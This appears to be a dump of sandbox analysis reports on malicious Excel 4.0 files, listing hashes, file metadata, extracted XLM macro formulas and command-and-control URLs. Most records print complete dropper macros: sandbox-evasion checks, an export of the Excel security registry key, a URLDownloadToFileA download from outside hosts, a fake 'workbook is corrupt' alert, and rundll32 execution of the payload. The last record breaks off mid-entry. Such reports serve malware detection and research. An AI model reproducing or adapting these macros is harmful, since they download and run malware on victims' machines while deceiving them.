{"version":"0.2","sample":{"sample":"","kind":"file","target":"8034093bd476ae2aaf967bf556b0388d610a8e6e0723c8c5615824cc4e1d46f1"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"8034093bd476ae2aaf967bf556b0388d610a8e6e0723c8c5615824cc4e1d46f1","filesize":225280,"md5":"352acd06a31b3788184e129e2ca87008","sha1":"0b6d1b0837c94fce2cb0ad06dc17a9bf9ede7875","sha256":"8034093bd476ae2aaf967bf556b0388d610a8e6e0723c8c5615824cc4e1d46f1","sha512":"c54e43e885b6f7658e929cc0c69f519e8e6b7f869869a17754220d50062ddf355cec2b814a542773388dd256167c2b2d0279b62613ac26da1bc02bb782b2aff9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8034093bd476ae2aaf967bf556b0388d610a8e6e0723c8c5615824cc4e1d46f1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eGoGy3gPSl\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8038ee6803333b24a48efccb3f406d6e65ccfe84ebdec28bf22bee4ceabb1062"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"8038ee6803333b24a48efccb3f406d6e65ccfe84ebdec28bf22bee4ceabb1062","filesize":214528,"md5":"d25464cb17c608a5b87aa857220e70a8","sha1":"90bae9005aae2bd778a3ee0522365981c64cc870","sha256":"8038ee6803333b24a48efccb3f406d6e65ccfe84ebdec28bf22bee4ceabb1062","sha512":"cce5143d5ef59dc77f3b675521e76743f29aeb7d0064bfcf9e48366200068fb145d07627b7e3d3af3ae1a885cb7c8613ec8721e98581da859563855f48c77c99","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8038ee6803333b24a48efccb3f406d6e65ccfe84ebdec28bf22bee4ceabb1062.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"DZHZYtKY2A\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"80447b8d91d776c37d2907273d3a8eccb91d2bc1cf72513cb85f78a2acb26748"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"80447b8d91d776c37d2907273d3a8eccb91d2bc1cf72513cb85f78a2acb26748","filesize":209920,"md5":"e74057fa22f657a6e29ffaef39a1f3c1","sha1":"d0a2ccd52f6170db8a90aa2c87e7dba181a22371","sha256":"80447b8d91d776c37d2907273d3a8eccb91d2bc1cf72513cb85f78a2acb26748","sha512":"bb4827dcc04ddb5127395a7fd82016a1c79785fb5ba8690ec42e1c7a970e1c9089285eaa95993e09c81d8d0300e40fd3bcc7bfa2d9c6bfd472c587f62a28390b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"80447b8d91d776c37d2907273d3a8eccb91d2bc1cf72513cb85f78a2acb26748.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cBLIPvDYPT\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"80606dc37e898ebbf183e8bab6b105d1ec7bb6a5fb85f10623de93d74742f090"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"80606dc37e898ebbf183e8bab6b105d1ec7bb6a5fb85f10623de93d74742f090","filesize":142848,"md5":"06cb711534f00ce4f8c3a52df3fdd8df","sha1":"4ea95d06dd11d8d2a0598feef192914d0c0c5492","sha256":"80606dc37e898ebbf183e8bab6b105d1ec7bb6a5fb85f10623de93d74742f090","sha512":"09916fccb2561597b07482886ad7a2dca926f60b7f5a3a15c36db1f7d0f516b028673588b622a493c7b013e6b1677bb65a46e90c9b4d3baf97b92127455017b0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"80606dc37e898ebbf183e8bab6b105d1ec7bb6a5fb85f10623de93d74742f090.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"d2ohWiOUUC\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8074c9f658633f9aa3df6ca741b738c188825cbd4d30de0b28eb136e63d6c0c5"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"8074c9f658633f9aa3df6ca741b738c188825cbd4d30de0b28eb136e63d6c0c5","filesize":116224,"md5":"f8028edb0568d21cfb56ced02d8a0831","sha1":"4bae63a0a8240ac520974c869a3a48adea574eaa","sha256":"8074c9f658633f9aa3df6ca741b738c188825cbd4d30de0b28eb136e63d6c0c5","sha512":"6c91bbfc1ee6396d8f8bcacd6a4fbc273b3e77b5716100125950ce5164e89ac22d412bb551c50f6ea4b070319b26657a6c62f1dd95605c05038e60150cf8f66f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8074c9f658633f9aa3df6ca741b738c188825cbd4d30de0b28eb136e63d6c0c5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MGpqv4W23v\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"809d81eb65ee01dafbb0e42e1ba8d062348bf9bb64582c032387d1c7ee42e226"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"809d81eb65ee01dafbb0e42e1ba8d062348bf9bb64582c032387d1c7ee42e226","filesize":170496,"md5":"d707062f520cc3384d275acee3783434","sha1":"1a15465da749bef02b120b4188a6c391f8c660be","sha256":"809d81eb65ee01dafbb0e42e1ba8d062348bf9bb64582c032387d1c7ee42e226","sha512":"46c4fb4b4d7a5a5515568a585c73ac7c6887c9f4077b794e2dc2d2580c55e7b697cf187ee89dcd5ec78c136e695a00a70bf5c1a05de99efdc6ba262f97662aad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"809d81eb65ee01dafbb0e42e1ba8d062348bf9bb64582c032387d1c7ee42e226.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vsqucVQiiX\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"80ba2c606f42ab62b01f61edbb6d177eebfb826a463f06d32b02dd0b57d846dc"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"80ba2c606f42ab62b01f61edbb6d177eebfb826a463f06d32b02dd0b57d846dc","filesize":167936,"md5":"a9a1a7028c32d0d02dbc721c51ae63fa","sha1":"9a710d0f07155be28a7e0d2d2495c9e3204c02f4","sha256":"80ba2c606f42ab62b01f61edbb6d177eebfb826a463f06d32b02dd0b57d846dc","sha512":"438713a6c389b755a93b78b2619d3c967957bff94803e7a63f64e18f729d69d1d12eb0e34c7cb66d1bd2c04522be4c68fdc4e70c3e5879591d1e1420050187b5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"80ba2c606f42ab62b01f61edbb6d177eebfb826a463f06d32b02dd0b57d846dc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iDOCclT39P\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"80c26268496c76e5da3422fd99102e5544805012ccb02278725683ddda066d8b"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"80c26268496c76e5da3422fd99102e5544805012ccb02278725683ddda066d8b","filesize":104448,"md5":"427fbaf015e4786eecf2df345ff5b68e","sha1":"2e94b92777449b7d94b1ddab177f6c4b9651c0a8","sha256":"80c26268496c76e5da3422fd99102e5544805012ccb02278725683ddda066d8b","sha512":"74d5e478837c751e3a537df2509a09ca8545202fb26fd34fc9f687332718fda42fb6d2eb7494b247b5d8d407e80b737c04398453cf70e7bc840fe78ac10fce0a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"80c26268496c76e5da3422fd99102e5544805012ccb02278725683ddda066d8b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"1SPR0hCv1j\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"80c759aa24b432985e5d6463c230d33af9fec5138e0e3f8f9570cb123b36492f"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"80c759aa24b432985e5d6463c230d33af9fec5138e0e3f8f9570cb123b36492f","filesize":126464,"md5":"0925cb325009c9ddc5867174df4a04bf","sha1":"ecf59fa079538494a55ccef59ebe6f80c287584d","sha256":"80c759aa24b432985e5d6463c230d33af9fec5138e0e3f8f9570cb123b36492f","sha512":"1b7a64d57bb4965af488d0fe25223c4a8f4b0f3dbd08fbd0c2376a49d23b048d4c6a3a8897e5f8d2ff4e5f122cce0b321ffce110425b14ac6287348633dab61b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"80c759aa24b432985e5d6463c230d33af9fec5138e0e3f8f9570cb123b36492f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://march262020.club/files/bot.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\\hQPDpQm\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://march262020.club/files/bot.dl\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll,DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"80d1e2c8d9d4abc5ac96f044d5f20c6caf5433d67aad008338fd31aed27bc7d5"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"80d1e2c8d9d4abc5ac96f044d5f20c6caf5433d67aad008338fd31aed27bc7d5","filesize":206336,"md5":"1e67888b1ba2acc4203b6fec7d3dc99f","sha1":"d7422b0da8f897ec135733980ba838d6f263590a","sha256":"80d1e2c8d9d4abc5ac96f044d5f20c6caf5433d67aad008338fd31aed27bc7d5","sha512":"7af4f9d7a15548dbd4d57f4f3f4793fb980d4246ec0a6024c710f674cca306d4780d53a1d4ebf4e5229dedda4f408fc1bf9a0d4fcfd1d09981d120972332e213","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"80d1e2c8d9d4abc5ac96f044d5f20c6caf5433d67aad008338fd31aed27bc7d5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AVF5ObAOd2\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"80eb223465e0c299fabe8de3ae1b0382b1c697c57739fda08d5d3a03a0a56cdc"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"80eb223465e0c299fabe8de3ae1b0382b1c697c57739fda08d5d3a03a0a56cdc","filesize":185344,"md5":"2e5defd8188129f7e10ff0cc511fe0bd","sha1":"611d64ed43f28d6e04ceafe0d6320e306fd66c6c","sha256":"80eb223465e0c299fabe8de3ae1b0382b1c697c57739fda08d5d3a03a0a56cdc","sha512":"2198f6f187aa162ff9a6d74796f99db6dead33523978958ceaa9b6c99105c9b75f5cebe3e265c2093eb0d8aa4d1ab8c1e77b20ef7493ea688cf3964a9ec4ca93","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"80eb223465e0c299fabe8de3ae1b0382b1c697c57739fda08d5d3a03a0a56cdc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"80f9d2ec4ec03b5755cb93b307bf2fbceba29d6a28c76c25844c50fcf6e9c78e"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"80f9d2ec4ec03b5755cb93b307bf2fbceba29d6a28c76c25844c50fcf6e9c78e","filesize":206336,"md5":"576c6611e17644d39b34d33194173223","sha1":"fd858594e65a44ccc5c12b5df6d4bcd807a709f4","sha256":"80f9d2ec4ec03b5755cb93b307bf2fbceba29d6a28c76c25844c50fcf6e9c78e","sha512":"500d6a79f40c1372f898e4d3296806f8339b057769df2edcbbb26ede24b2fdc877711ad62ea2200b3a5d5310761498c38b7402d3181e9642872288510dbe6405","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"80f9d2ec4ec03b5755cb93b307bf2fbceba29d6a28c76c25844c50fcf6e9c78e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"r4zIze9EFl\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"80fca84ad7d23c39bd5daa5ae11258ed9b29fe0505bf2c8a5ba6941b43750568"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"80fca84ad7d23c39bd5daa5ae11258ed9b29fe0505bf2c8a5ba6941b43750568","filesize":168960,"md5":"b6862bc5aa42b74bd093bd7a5b70e938","sha1":"aef4dc590fde9c78175bfa14f3e4ea2751d06f33","sha256":"80fca84ad7d23c39bd5daa5ae11258ed9b29fe0505bf2c8a5ba6941b43750568","sha512":"609a11cb972def096defae666e0c03eddfd92e8b6c6abab4a55edf6f1bf1fdc88b389ded9f6f6a029a14926bdcea01acbee156b81164997ac4fecb7cb8e39dfc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"80fca84ad7d23c39bd5daa5ae11258ed9b29fe0505bf2c8a5ba6941b43750568.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mIzLVdnEDT\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"80fdc031b4ae28a303423a23d1a44183f0a63e9f319207351835884b13890d6c"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"80fdc031b4ae28a303423a23d1a44183f0a63e9f319207351835884b13890d6c","filesize":167936,"md5":"44a6e3a9f4051bb843b3468bdaab82a3","sha1":"9a3fe845cc163fb3cbac7812b60222e2dd45505a","sha256":"80fdc031b4ae28a303423a23d1a44183f0a63e9f319207351835884b13890d6c","sha512":"9895e70adb5b246306cf06d757a2b975c81b98323e4aacb91b25ba0d0af83cc3bcc75e250cba118c800f50705c73542f1d2dbcc5711e09734b07b862c6d7e4df","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"80fdc031b4ae28a303423a23d1a44183f0a63e9f319207351835884b13890d6c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MAZ60zMl2K\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"810422e7d93118f8d7861ea36cdc9b295b54b6e499673ddedea64946292fba1e"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"810422e7d93118f8d7861ea36cdc9b295b54b6e499673ddedea64946292fba1e","filesize":104448,"md5":"9a7f192e766b81989a648edbe7c79da6","sha1":"ec4f4ee15829a69c4e2585c743917f4fb45b1620","sha256":"810422e7d93118f8d7861ea36cdc9b295b54b6e499673ddedea64946292fba1e","sha512":"a8ff76e68d642783bbd523b76012f5ff52e76ef26fa6e40e7c62723d961b553b484ac0d7cd768d763dfe34ff253e05fc6baeb40bf3e1b65140e44469b394e635","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"810422e7d93118f8d7861ea36cdc9b295b54b6e499673ddedea64946292fba1e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM 